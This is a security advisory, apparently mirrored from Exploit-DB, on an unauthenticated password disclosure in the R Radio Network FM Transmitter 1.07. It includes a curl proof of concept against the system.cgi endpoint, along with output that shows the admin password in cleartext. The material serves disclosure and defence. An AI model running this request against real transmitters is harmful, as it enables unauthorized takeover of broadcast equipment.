R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

vendor:

FM Transmitter

by:

Gjoko 'LiquidWorm' Krstic

6.1

CVSS

HIGH

Improper Access Control

284

CWE

Product Name: FM Transmitter

Affected Version From: 01.07

Affected Version To: 01.07

Patch Exists: NO

Related CWE:

CPE: a:r_radio_network:fm_transmitter:1.07

Metasploit:

Other Scripts:

Platforms Tested: CSBtechDevice

2023

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

The R Radio FM Transmitter version 1.07 is vulnerable to an improper access control issue that allows unauthenticated users to access the system.cgi endpoint and reveal the plaintext password of the admin user, facilitating authentication bypass and unauthorized access to FM station setup.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to the system.cgi endpoint and ensure proper authentication mechanisms are in place. Users should also consider updating to a patched version if available.

Source

Exploit-DB raw data:

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure


Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07

Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.

Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.

Tested on: CSBtechDevice


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php


09.10.2023

--


$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$